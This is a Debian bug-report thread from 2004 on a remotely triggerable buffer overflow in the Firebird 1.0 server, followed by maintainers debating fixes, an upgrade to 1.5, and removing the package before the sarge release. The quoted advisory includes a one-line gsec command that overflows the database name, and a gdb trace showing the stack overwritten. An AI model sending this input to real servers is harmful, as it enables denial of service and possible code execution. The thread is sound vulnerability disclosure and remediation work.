Debian Bug report logs - #251458
firebird: remote vulnerability

Toggle useless messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>

To: Debian Bug Tracking System <submit@bugs.debian.org>

Cc: noamr@beyondsecurity.com

Subject: firebird: remote vulnerability

Date: Fri, 28 May 2004 17:47:10 +0200

Package: firebird
Severity: grave
Tags: security, help

Hi,

While preparing an nmu for this package I became aware of a security problem
from the previous maintainer. (I am considering adopting.)

If somebody knows this is fixed in firebird 1.0.3 that would be useful
information to me.

Cheers,
Remco.

The problem is described in this e-mail:
--------------------------------------
Return-Path: <noamr@beyondsecurity.com>
X-Original-To: mdz@csh.rit.edu
Delivered-To: mdz@csh.rit.edu
Received: from mail.csh.rit.edu [129.21.60.6]
	by localhost with IMAP (fetchmail-6.2.5)
	for mdz@localhost (single-drop); Mon, 17 May 2004 09:06:55 -0700 (PDT)
Received: from klecker.debian.org (klecker.debian.org [194.109.137.218])
	by blacksheep.csh.rit.edu (Postfix) with ESMTP id CF1519C50
	for <mdz@csh.rit.edu>; Mon, 17 May 2004 12:05:12 -0400 (EDT)
Received: from l192-117-97-135.broadband.actcom.net.il (vizzini.securiteam.com) [192.117.97.135] 
	by klecker.debian.org with esmtp (Exim 3.35 1 (Debian))
	id 1BPkby-0007iv-00; Mon, 17 May 2004 18:05:07 +0200
Received: from [192.168.1.52] ([192.168.1.52])
	by vizzini.securiteam.com (8.12.11/8.12.11/Debian-3) with ESMTP id i4HG4YSD025759;
	Mon, 17 May 2004 19:04:35 +0300
From: Noam Rathaus <noamr@beyondsecurity.com>
Organization: Beyond Security
To: security@debian.org, team@security.debian.org
Subject: Security Vulnerability in Firefox Database
Date: Mon, 17 May 2004 19:04:54 +0300
User-Agent: KMail/1.6.2
Cc: SecurITeam News <news@securiteam.com>
MIME-Version: 1.0
Content-Disposition: inline
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Message-Id: <200405171904.54492.noamr@beyondsecurity.com>
Delivered-To: team@security.debian.org
X-Bogosity: No, tests=bogofilter, spamicity=0.000000, version=0.90.0

Hi,

Hi,

I know that version LI-V6.2.908 Firebird 1.0 (1.0.2-2.1) is very old, but=20
there appears to be an remotely exploitable overflow in this program.

By issuing:
gsec -database 192.168.1.52:`perl -e'print ("A"x300)'`
=2Duser whenever -password whatever

On a remote server, you can see that:
gdb /usr/lib/firebird/bin/ibserver
GNU gdb 6.1-debian
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are
welcome to change it and/or distribute copies of it
under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. =A0Type "show
warranty" for details.
This GDB was configured as "i386-linux"...(no debugging
symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".

(gdb) r
Starting program: /usr/lib/firebird/bin/ibserver
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[Thread
debugging using libthread_db enabled]
[New Thread 1075462272 (LWP 31389)]
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[New
Thread 1092549552 (LWP 31392)]
[New Thread 1100938160 (LWP 31393)]
[Thread 1100938160 (LWP 31393) exited]
[Thread 1092549552 (LWP 31392) exited]
[New Thread 1092549552 (LWP 31396)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1092549552 (LWP 31396)]
0x08132223 in ERR_post ()


(gdb) bt
#0 =A00x08132223 in ERR_post ()
#1 =A00x080942ac in THD_wlck_unlock ()
#2 =A00x41414141 in ?? ()
#3 =A00x41414141 in ?? ()
#4 =A00x41414141 in ?? ()
#5 =A00x41414141 in ?? ()
#6 =A00x41414141 in ?? ()
#7 =A00x41414141 in ?? ()
#8 =A00x00414141 in ?? ()
#9 =A00x0000012c in ?? ()
=2E..

Debian is currently not maintaining this version of the product, but I thou=
ght=20
it was worth mentioning.

=2D-=20
Thanks
Noam Rathaus
CTO
Beyond Security Ltd.

Join the SecuriTeam community on Orkut:
http://www.orkut.com/Community.aspx?cmm=3D44441

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (990, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.4.26-1-686
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8
--------------------------------------

Message #10 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Matt Zimmerman <mdz@debian.org>

To: 251458@bugs.debian.org

Subject: [aviram@beyondsecurity.com: Firebird Database Remote Database Name Overflow]

Date: Tue, 1 Jun 2004 14:54:42 -0700

----- Forwarded message from Aviram Jenik <aviram@beyondsecurity.com> -----

Date: Tue, 1 Jun 2004 20:41:24 +0300
From: Aviram Jenik <aviram@beyondsecurity.com>
To: bugtraq@securityfocus.com
Subject: Firebird Database Remote Database Name Overflow

 Firebird Database Remote Database Name Overflow
------------------------------------------------------------------------

Article reference:
http://www.securiteam.com/unixfocus/5AP0P0UCUO.html


SUMMARY

<http://firebird.sourceforge.net> Firebird is "a relational database offering 
many ANSI SQL-92 features that runs on Linux, Windows, and a variety of Unix 
platforms. Firebird offers excellent concurrency, high performance, and 
powerful language support for stored procedures and triggers. It has been 
used in production systems, under a variety of names since 1981".

A vulnerability in Firebird Database's way of handling database names, allows 
an unauthenticated user to cause the server to crash, and overwrite critical 
section of the stack used by the database.

DETAILS

Vulnerable Systems:
* Firebird Database version 1.0 (1.0.2-2.1) - Debian unstable

Immune Systems:
* Firebird Database version 1.5.0 (others are presumed to be immune as well)


By issuing:
gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever 
-password whatever

On a remote server, you can see that:
gdb /usr/lib/firebird/bin/ibserver
GNU gdb 6.1-debian Copyright 2004 Free Software Foundation, Inc. GDB is 
free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute copies of it 
under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for 
details.
This GDB was configured as "i386-linux"...(no debugging symbols 
found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".

(gdb) r
Starting program: /usr/lib/firebird/bin/ibserver
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[Thread
debugging using libthread_db enabled]
[New Thread 1075462272 (LWP 31389)]
(no debugging symbols found)...(no debugging symbols
found)...(no debugging symbols found)...(no debugging
symbols found)...(no debugging symbols found)...[New
Thread 1092549552 (LWP 31392)]
[New Thread 1100938160 (LWP 31393)]
[Thread 1100938160 (LWP 31393) exited]
[Thread 1092549552 (LWP 31392) exited]
[New Thread 1092549552 (LWP 31396)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 1092549552 (LWP 31396)]
0x08132223 in ERR_post ()


(gdb) bt
#0  0x08132223 in ERR_post ()
#1  0x080942ac in THD_wlck_unlock ()
#2  0x41414141 in ?? ()
#3  0x41414141 in ?? ()
#4  0x41414141 in ?? ()
#5  0x41414141 in ?? ()
#6  0x41414141 in ?? ()
#7  0x41414141 in ?? ()
#8  0x00414141 in ?? ()
#9  0x0000012c in ?? ()
..

Solution:
Debian is currently not maintaining this version of the product, so it is 
recommended that you use a source code based installation.


ADDITIONAL INFORMATION

The information has been provided by <mailto:expert@securiteam.com> Noam 
Rathaus.


Regards, 
Aviram Jenik
Beyond Security Ltd.

http://www.BeyondSecurity.com
http://www.SecuriTeam.com

The First Integrated Network and Web Application Vulnerability Scanner:
http://www.beyondsecurity.com/webscan-wp.pdf




==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 

----- End forwarded message -----

-- 
 - mdz

Message #15 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>

To: 251458@bugs.debian.org

Subject: firebird-1.0.3 also affected

Date: Fri, 4 Jun 2004 21:44:11 +0200

Hi,

I just updated the packages to 1.0.3 and was able to reproduce this bug 
on 1.0.2 and on 1.0.3. Which means 1.0.3 is also vulnerable. I don't know
if upstream 1.0.3 is affected but it seams likely.

The plan was to let version 1.0.3 coexist with 1.5.0. Unless this plan changes
upgrading to 1.5.0 doens't provide a solution.

If anybody is interested in helping out to speed things up, updated
packages are here (which still contain this bug):

http://mentors.debian.net/debian/pool/main/

Cheers,
Remco.

Message #20 received at 251458@bugs.debian.org (full text, mbox, reply):

From: "Grzegorz B. Prokopski" <gadek@debian.org>

To: Remco Seesink <raseesink@hotpop.com>, 251458@bugs.debian.org

Subject: Re: Bug#251458: firebird-1.0.3 also affected

Date: Sat, 05 Jun 2004 16:38:12 -0400

W liście z pią, 04-06-2004, godz. 15:44, Remco Seesink pisze: 
> Hi,
> 
> I just updated the packages to 1.0.3 and was able to reproduce this bug 
> on 1.0.2 and on 1.0.3. Which means 1.0.3 is also vulnerable. I don't know
> if upstream 1.0.3 is affected but it seams likely.
> 
> The plan was to let version 1.0.3 coexist with 1.5.0. Unless this plan changes
> upgrading to 1.5.0 doens't provide a solution.
> 
> If anybody is interested in helping out to speed things up, updated
> packages are here (which still contain this bug):
> 
> http://mentors.debian.net/debian/pool/main/

I think it would be best to ask on firebird-devel mailing list.

I suspect they have produced a patch for that.

As soon as the packages w/ proper fix are available I can sponsor
their upload to the official Debian archive.  I consider it almost
a "Release Critical" bug, which is bad, because Sarge might be
released (and frozen before that - which means: harder updates!) in
not too distant feature.

Cheers,

			Grzegorz B. Prokopski

PS: Just for the benefit of other people on the pkg-firebird mailing
list let me mention that the full record of this bugreport can be
viewed at:

	http://bugs.debian.org/251458

-- 
Grzegorz B. Prokopski <gadek@debian.org>
Debian GNU/Linux      http://www.debian.org
SableVM - LGPLed JVM  http://www.sablevm.org
Why SableVM ?!?       http://devel.sablevm.org/wiki/WhySableVM

Message #25 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>

To: firebird-devel@lists.sourceforge.net

Cc: 251458@bugs.debian.org

Subject: Patch for vulnerability firebird 1.0.3 ?

Date: Thu, 10 Jun 2004 21:07:44 +0200

Hello,

I am trying to fix a security bug on firebird 1.0.2 and 1.0.3 on debian. The details of the bug can be found here:
http://bugs.debian.org/251458

I was wondering if somebody already made a patch for this bug. The current plan is to support both firebird 1.0.3 and 1.5.0 in debian. This is why upgrading to 1.5.0 wouldn't help.

If there is no patch, any pointers to what source files are likely involved?

Cheers,
Remco Seesink.

Message #30 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Alex Peshkov <pes@insi.yaroslavl.ru>

To: firebird-devel@lists.sourceforge.net

Cc: 251458@bugs.debian.org

Subject: Re: [Firebird-devel] Patch for vulnerability firebird 1.0.3 ?

Date: Wed, 16 Jun 2004 15:57:52 +0400

Remco Seesink wrote:

>Hello,
>
>I am trying to fix a security bug on firebird 1.0.2 and 1.0.3 on debian. The details of the bug can be found here:
>http://bugs.debian.org/251458
>
>I was wondering if somebody already made a patch for this bug. The current plan is to support both firebird 1.0.3 and 1.5.0 in debian. This is why upgrading to 1.5.0 wouldn't help.
>
>If there is no patch, any pointers to what source files are likely involved?
>  
>
Unfortunately, very many.
It was rather big code review during which we tried to fix a great(!) 
lot of buffer overflows in firebird sources.
Particular this bug may be fixed relatively easy, but on my mind it has 
no sence - there is a great lot of other overflows and some other 
security holes (including execution of arbitrary code with root rights) 
that were fixed in fb1.5.
It seems unreal to me to backport them all to 1.0, therefore if one 
cares about security - use 1.5.

>Cheers,
>Remco Seesink.
>
>
>  
>
Alex.

Message #35 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>

To: Alex Peshkov <pes@insi.yaroslavl.ru>, 251458@bugs.debian.org

Subject: Re: Bug#251458: [Firebird-devel] Patch for vulnerability firebird 1.0.3 ?

Date: Wed, 16 Jun 2004 19:42:29 +0200

On Wed, 16 Jun 2004 15:57:52 +0400
Alex Peshkov <pes@insi.yaroslavl.ru> wrote:

> Unfortunately, very many.
> It was rather big code review during which we tried to fix a great(!) 
> lot of buffer overflows in firebird sources.
> Particular this bug may be fixed relatively easy, but on my mind it has 
> no sence - there is a great lot of other overflows and some other 
> security holes (including execution of arbitrary code with root rights) 
> that were fixed in fb1.5.
> It seems unreal to me to backport them all to 1.0, therefore if one 
> cares about security - use 1.5.

Thank you for your reply. We will have to speed up the packaging of 1.5
and at least put some warnings on the 1.0.3 installation.

Cheers,
Remco.

Message #40 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>

To: 251458@bugs.debian.org

Cc: Remco Seesink <raseesink@hotpop.com>, Ed Boraas <ed@debian.org>, php4-interbase@packages.qa.debian.org, python-kinterbasdb@packages.qa.debian.org, Nicolas Ledez <nledez@virtual-net.fr>, zope-kinterbasdbda@packages.qa.debian.org

Subject: Re: firebird: remote vulnerability

Date: Tue, 27 Jul 2004 02:34:32 -0700

[Message part 1 (text/plain, inline)]

Hello,

The firebird package in Debian has a long-standing remote security hole.
We should not release such a package in sarge.

Removing this package from sarge will also mean removing the
php4-interbase, python-kinterbasdb, and zope-kinterbasdbda packages;
therefore, as maintainers of these packages, I am cc:ing you to see if
any of you are willing to do the necessary work to get the firebird
package ready for release.

I understand that the bugs are supposed to be fixed in firebird 1.5,
which is not yet packaged.  If this is too much work to get done before
sarge, perhaps it makes sense to upload a firebird 1.0 package providing
only the client libraries?

Thanks,
-- 
Steve Langasek
postmodern programmer

[signature.asc (application/pgp-signature, inline)]

Message #45 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>

To: Steve Langasek <vorlon@debian.org>, Debian Firebird Group <pkg-firebird-general@lists.alioth.debian.org>

Cc: 251458@bugs.debian.org, ed@debian.org, php4-interbase@packages.qa.debian.org, python-kinterbasdb@packages.qa.debian.org, nledez@virtual-net.fr, zope-kinterbasdbda@packages.qa.debian.org

Subject: Re: firebird: remote vulnerability

Date: Tue, 27 Jul 2004 21:05:28 +0200

On Tue, 27 Jul 2004 02:34:32 -0700
Steve Langasek <vorlon@debian.org> wrote:
> The firebird package in Debian has a long-standing remote security
> hole. We should not release such a package in sarge.
> 
> Removing this package from sarge will also mean removing the
> php4-interbase, python-kinterbasdb, and zope-kinterbasdbda packages;
> therefore, as maintainers of these packages, I am cc:ing you to see if
> any of you are willing to do the necessary work to get the firebird
> package ready for release.
> 
> I understand that the bugs are supposed to be fixed in firebird 1.5,
> which is not yet packaged.  If this is too much work to get done
> before sarge, perhaps it makes sense to upload a firebird 1.0 package
> providing only the client libraries?

Hello,

Firebird 1.5.0 is currently waiting for the ftp-masters to be accepted to
get included in unstable. It already received testing and it could provide
the libfirebird dependency which would satisfy existing packages. I believe
the current uploaded version does not do that yet, but could be fixed easy.
A 1.5.1 version is also ready for upload. Daniel Urban <daniel@sente.pl> has
done the most work and people from the mailinglist
pkg-firebird-general@lists.alioth.debian.org

The 1.5 version is packaged as firebird2 and could live in the same
repository.

There is a need for firebird 1.0.3 besides the 1.5 version, but the 1.5
version includes extensive code reviews which fix many security related
bugs, not just #251458. 

There is also a package (ibwebadmin) waiting for my sponsor to upload it
which depends on php-interbase, until that happens it is not a problem for
the release :/

Cheers,
Remco.

Message #50 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>

To: Remco Seesink <raseesink@hotpop.com>

Cc: Debian Firebird Group <pkg-firebird-general@lists.alioth.debian.org>, 251458@bugs.debian.org, ed@debian.org, nledez@virtual-net.fr

Subject: Re: firebird: remote vulnerability

Date: Tue, 27 Jul 2004 21:33:13 -0700

[Message part 1 (text/plain, inline)]

On Tue, Jul 27, 2004 at 09:05:28PM +0200, Remco Seesink wrote:
> On Tue, 27 Jul 2004 02:34:32 -0700
> Steve Langasek <vorlon@debian.org> wrote:
> > The firebird package in Debian has a long-standing remote security
> > hole. We should not release such a package in sarge.

> > Removing this package from sarge will also mean removing the
> > php4-interbase, python-kinterbasdb, and zope-kinterbasdbda packages;
> > therefore, as maintainers of these packages, I am cc:ing you to see if
> > any of you are willing to do the necessary work to get the firebird
> > package ready for release.

> > I understand that the bugs are supposed to be fixed in firebird 1.5,
> > which is not yet packaged.  If this is too much work to get done
> > before sarge, perhaps it makes sense to upload a firebird 1.0 package
> > providing only the client libraries?

> Firebird 1.5.0 is currently waiting for the ftp-masters to be accepted to
> get included in unstable. It already received testing and it could provide
> the libfirebird dependency which would satisfy existing packages. I believe
> the current uploaded version does not do that yet, but could be fixed easy.
> A 1.5.1 version is also ready for upload. Daniel Urban <daniel@sente.pl> has
> done the most work and people from the mailinglist
> pkg-firebird-general@lists.alioth.debian.org

> The 1.5 version is packaged as firebird2 and could live in the same
> repository.

> There is a need for firebird 1.0.3 besides the 1.5 version, but the 1.5
> version includes extensive code reviews which fix many security related
> bugs, not just #251458. 

As you have probably seen, firebird 1.5 has cleared the NEW queue now.

Can you elaborate on what the needs are for a firebird 1.0.3?  If the
libraries can be provided by the firebird2 package, and the firebird 1.0
server has too many security holes to be included in a stable release,
what's left in the 1.0 package that warrants keeping it around?  When I
asked James to look at this one, he did have misgivings about the
package rename, since there's no evident reason to keep two source
packages around; so I'd like to know there's a good answer for this.

In any case, at this point the quickest way to get these packages into
a releasable state, now that firebird2 is available, is to remove the
binary package from firebird (1.0) that contains the security problems,
so that this bug can be closed.  Once that's done, you can sort out
which package you want to provide the libraries in the long term; but
trying to make such changes now is likely to prejudice the chances of
any of these client packages making it into sarge.

Thanks,
-- 
Steve Langasek
postmodern programmer

[signature.asc (application/pgp-signature, inline)]

Message #55 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>

To: Steve Langasek <vorlon@debian.org>

Cc: pkg-firebird-general@lists.alioth.debian.org, 251458@bugs.debian.org, ed@debian.org, nledez@virtual-net.fr

Subject: Re: Bug#251458: firebird: remote vulnerability

Date: Wed, 28 Jul 2004 10:52:31 +0200

> Can you elaborate on what the needs are for a firebird 1.0.3?  If the
> libraries can be provided by the firebird2 package, and the firebird
> 1.0 server has too many security holes to be included in a stable
> release, what's left in the 1.0 package that warrants keeping it
> around?  When I asked James to look at this one, he did have
> misgivings about the package rename, since there's no evident reason
> to keep two source packages around; so I'd like to know there's a good
> answer for this.
>
> In any case, at this point the quickest way to get these packages into
> a releasable state, now that firebird2 is available, is to remove the
> binary package from firebird (1.0) that contains the security
> problems, so that this bug can be closed.  Once that's done, you can
> sort out which package you want to provide the libraries in the long
> term; but trying to make such changes now is likely to prejudice the
> chances of any of these client packages making it into sarge.

Well, frankly I am not the biggest supporter of keeping them both so I
might not know the comprehensive list of reasons, but this is what I
know:
1. When migrating to 1.5 you should backup with the old server and
   restore with the new. This is needed when ODS (On Disk Structure)
   changes are in the database format.
2. Not all applications will work out of the box from 1.0.x moving to
   1.5.x

I suggest people on pkg-firebird-general knowing more than I do to step
forward. If it was up to me I would remove firebird 1.0.3 of the archive
and put them on http://firebird.debian.net. libfirebird2-* would only
need to provide libfirebird and all existing packages should be happy
without recompile. libgds.so.0 is symlinked to fbclient.so.0. This is
tested with php4-interbase and a not packaged binary (ibaccess)

If this would happen I am not so sure about the usefulness of the
firebird2 naming.

Cheers,
Remco.

Message #60 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: Damyan Ivanov <divanov@creditreform.bg>

To: pkg-firebird-general@lists.alioth.debian.org

Cc: Steve Langasek <vorlon@debian.org>, 251458-quiet@bugs.debian.org, ed@debian.org, nledez@virtual-net.fr

Subject: Re: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability

Date: Wed, 28 Jul 2004 12:05:52 +0300

[Message part 1 (text/plain, inline)]

Hi, Remco and all,

My thoughts:

Remco Seesink wrote:
> Well, frankly I am not the biggest supporter of keeping them both so I
> might not know the comprehensive list of reasons, but this is what I
> know:
> 1. When migrating to 1.5 you should backup with the old server and
>    restore with the new. This is needed when ODS (On Disk Structure)
>    changes are in the database format.

This is not required. Newer servers can work with older databases. A 
file backup of the database is recommended just in case, but otherwise 
there should be no problems.

> 2. Not all applications will work out of the box from 1.0.x moving to
>    1.5.x

Do you have in mind some example incompatibility? I don't think there is 
something fatal.

> I suggest people on pkg-firebird-general knowing more than I do to step
> forward. If it was up to me I would remove firebird 1.0.3 of the archive
> and put them on http://firebird.debian.net.

I second this. 1.0.x is obsolete (according to the developers), but 
putting it somewhere just in case is very good.

> libfirebird2-* would only
> need to provide libfirebird and all existing packages should be happy
> without recompile. libgds.so.0 is symlinked to fbclient.so.0. This is
> tested with php4-interbase and a not packaged binary (ibaccess)

Yes, this should work. (famous last words)

> If this would happen I am not so sure about the usefulness of the
> firebird2 naming.

Maybe we can rename it to firebird later, but I am not sure what 
reflections a rename will have right now, before sarge release.


Thanks,
dam

-- 
Damyan Ivanov                             Creditreform Bulgaria
divanov@creditreform.bg             http://www.creditreform.bg/
phone: +359(2)928-2611, 929-3993           fax: +359(2)920-0994
mobile: +359-88-856-6067      ICQ: 3028500      Y!M: dam3028500

[signature.asc (application/pgp-signature, attachment)]

Message #65 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>

To: Damyan Ivanov <divanov@creditreform.bg>, 251458-quiet@bugs.debian.org

Cc: pkg-firebird-general@lists.alioth.debian.org, vorlon@debian.org, 251458-quiet@bugs.debian.org, ed@debian.org, nledez@virtual-net.fr

Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability

Date: Wed, 28 Jul 2004 11:39:09 +0200

> > 2. Not all applications will work out of the box from 1.0.x moving to
> >    1.5.x
> 
> Do you have in mind some example incompatibility? I don't think there is 
> something fatal.

That could be true. I noticed ibconsole from IB6 doesn't work well with
firebird 1.5. It is complaining the version is to *old*.

Also firebird 1.5 is more strict with sql and can trigger bugs
not noticed in 1.0.x. Of course this is minor when developing, but can
be a pain for people just deploying. An example I ran into: doing an order
by in a select count(*) query is no longer allowed. (and shouldn't be)

There may be other issues.

Cheers,
Remco.

Message #70 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Damyan Ivanov <divanov@creditreform.bg>

To: 251458@bugs.debian.org

Cc: vorlon@debian.org, ed@debian.org, nledez@virtual-net.fr

Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability

Date: Wed, 28 Jul 2004 16:14:40 +0300

[Message part 1 (text/plain, inline)]

Remco Seesink wrote:
>>>2. Not all applications will work out of the box from 1.0.x moving to
>>>   1.5.x
>>
>>Do you have in mind some example incompatibility? I don't think there is 
>>something fatal.
> 
> That could be true. I noticed ibconsole from IB6 doesn't work well with
> firebird 1.5. It is complaining the version is to *old*.
> 
> Also firebird 1.5 is more strict with sql and can trigger bugs
> not noticed in 1.0.x. Of course this is minor when developing, but can
> be a pain for people just deploying. An example I ran into: doing an order
> by in a select count(*) query is no longer allowed. (and shouldn't be)
> 
> There may be other issues.

You're right.
That's why putting 1.0.3 on debian.net is a good idea. Maybe a note (and 
security warning) in README.Debian of 1.5.x packages could be useful to 
point the desperate to 1.0.3 packages...

I for one plan to run our production server with 1.0.3 for some time... :-)



Thanks,
dam

-- 
Damyan Ivanov                             Creditreform Bulgaria
divanov@creditreform.bg             http://www.creditreform.bg/
phone: +359(2)928-2611, 929-3993           fax: +359(2)920-0994
mobile: +359-88-856-6067      ICQ: 3028500      Y!M: dam3028500

[signature.asc (application/pgp-signature, attachment)]

Message #75 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: "Daniel Urban" <daniel@sente.pl>

To: "Damyan Ivanov" <divanov@creditreform.bg>, <251458-quiet@bugs.debian.org>, <pkg-firebird-general@lists.alioth.debian.org>

Cc: "Steve Langasek" <vorlon@debian.org>, <251458-quiet@bugs.debian.org>, <ed@debian.org>, <nledez@virtual-net.fr>

Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability

Date: Wed, 28 Jul 2004 17:24:53 +0200

> 
> 
> > If this would happen I am not so sure about the usefulness of the
> > firebird2 naming.
> 
> Maybe we can rename it to firebird later, but I am not sure what 
> reflections a rename will have right now, before sarge release.
> 

I'm for renaming firebird2 to firebird.
Could we do it now? Greg? Would be a problem with it now?

Best regards
Daniel Urban

Message #80 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: "Grzegorz B. Prokopski" <gadek@debian.org>

To: Daniel Urban <daniel@sente.pl>, 251458-quiet@bugs.debian.org

Cc: Damyan Ivanov <divanov@creditreform.bg>, pkg-firebird-general@lists.alioth.debian.org, Steve Langasek <vorlon@debian.org>, ed@debian.org, nledez@virtual-net.fr

Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability

Date: Wed, 28 Jul 2004 13:36:48 -0400

On Wed, 2004-07-28 at 11:24, Daniel Urban wrote:
> > 
> > 
> > > If this would happen I am not so sure about the usefulness of the
> > > firebird2 naming.
> > 
> > Maybe we can rename it to firebird later, but I am not sure what 
> > reflections a rename will have right now, before sarge release.
> > 
> I'm for renaming firebird2 to firebird.
> Could we do it now? Greg? Would be a problem with it now?

Yes, it would be.  But really, there's no point doing that.
Having it as a separate package gives us more flexibility:

* we would be able to push old fb into Sarge (i.e. with *big* security
warning and access allowed only from localhost, etc.) if we didn't
have fb2 in time (mind you, fb2 debs are NOT in testing yet and they
haven't had really wide testing as they only just hit unstable).

* we can still have old firebird packages around (i.e. in an unofficial
repository) and they would NOT be:
 - mistaken with firebird2 packages
 - auto-upgraded on standard system upgrade and overriden with 1.5.x
   version (otherwise you would need to keep them "on hold" which
   would make the automatic updates from unofficial repository
   impossible)

This is a common practice that you add a release number to the package
name when you want to keep the old version around for users that might
need it.  Just see the output of 'apt-cache search tk8'.

Cheers,

				GBP
-- 
Grzegorz B. Prokopski      <gadek@debian.org>
Debian GNU/Linux           http://www.debian.org
SableVM - LGPL'ed Java VM  http://www.sablevm.org
Why SableVM ?!?            http://devel.sablevm.org/wiki/Features

Message #85 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>

To: "Grzegorz B. Prokopski" <gadek@debian.org>

Cc: Daniel Urban <daniel@sente.pl>, 251458-quiet@bugs.debian.org, Damyan Ivanov <divanov@creditreform.bg>, pkg-firebird-general@lists.alioth.debian.org, ed@debian.org, nledez@virtual-net.fr

Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability

Date: Sat, 31 Jul 2004 02:42:41 -0700

[Message part 1 (text/plain, inline)]

On Wed, Jul 28, 2004 at 01:36:48PM -0400, Grzegorz B. Prokopski wrote:
> On Wed, 2004-07-28 at 11:24, Daniel Urban wrote:

> > > > If this would happen I am not so sure about the usefulness of the
> > > > firebird2 naming.

> > > Maybe we can rename it to firebird later, but I am not sure what 
> > > reflections a rename will have right now, before sarge release.

> > I'm for renaming firebird2 to firebird.
> > Could we do it now? Greg? Would be a problem with it now?

> Yes, it would be.  But really, there's no point doing that.
> Having it as a separate package gives us more flexibility:

> * we would be able to push old fb into Sarge (i.e. with *big* security
> warning and access allowed only from localhost, etc.) if we didn't
> have fb2 in time (mind you, fb2 debs are NOT in testing yet and they
> haven't had really wide testing as they only just hit unstable).

I'm sorry, but shipping a package with known exploitable security holes
in sarge is not an option.  If no one is able to fix the security
problems in the firebird server package (and I assume no one is, since
this bug has been open so long), then the firebird server package will
have to be removed from sarge -- along with all other binary packages
from the same source, as well as all other binary packages depending on
these packages.

> * we can still have old firebird packages around (i.e. in an unofficial
> repository) and they would NOT be:
>  - mistaken with firebird2 packages
>  - auto-upgraded on standard system upgrade and overriden with 1.5.x
>    version (otherwise you would need to keep them "on hold" which
>    would make the automatic updates from unofficial repository
>    impossible)

> This is a common practice that you add a release number to the package
> name when you want to keep the old version around for users that might
> need it.  Just see the output of 'apt-cache search tk8'.

I don't know that a comparison with a scripting language is the best
one, here.  And the value of helping users keep remotely-exploitable
software on their systems is definitely questionable.

I see from the latest firebird2 upload that the library packages now
provide: libfirebird and libfirebird2.  But the following is not
appropriate in *any* library package:

$ dpkg -c libfirebird2-classic_1.5.0-1_i386.deb |grep /usr/lib/libgds
lrwxrwxrwx root/root         0 2004-07-19 05:27:21 ./usr/lib/libgds.so -> libfbembed.so.1.5.0
$

I have checked php4-interbase, and confirmed that the soname this file
looks for is "libgds.so".  This means that there is no support
whatsoever for rebuilding software against a new version of libgds,
without breaking other programs that use the old version.  This is a
truly horrid setup, and I would strongly recommend that you rebuild all
of the firebird client packages prior to sarge's release so that they
will have a proper dependency on libfirebird2 and you can drop the
libgds.so symlink.

(BTW, where does the "2" in "libfirebird2" come from?  This is not the
soversion of either of the libraries contained in this package.)

-- 
Steve Langasek
postmodern programmer

[signature.asc (application/pgp-signature, inline)]

Message #90 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: "Grzegorz B. Prokopski" <gadek@debian.org>

To: Steve Langasek <vorlon@debian.org>

Cc: Daniel Urban <daniel@sente.pl>, 251458-quiet@bugs.debian.org, Damyan Ivanov <divanov@creditreform.bg>, Debian Firebird Group <pkg-firebird-general@lists.alioth.debian.org>, ed@debian.org, nledez@virtual-net.fr

Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability

Date: Sat, 31 Jul 2004 12:43:16 -0400

W liście z sob, 31-07-2004, godz. 05:42, Steve Langasek pisze: 
> On Wed, Jul 28, 2004 at 01:36:48PM -0400, Grzegorz B. Prokopski wrote:
> > On Wed, 2004-07-28 at 11:24, Daniel Urban wrote:
> 
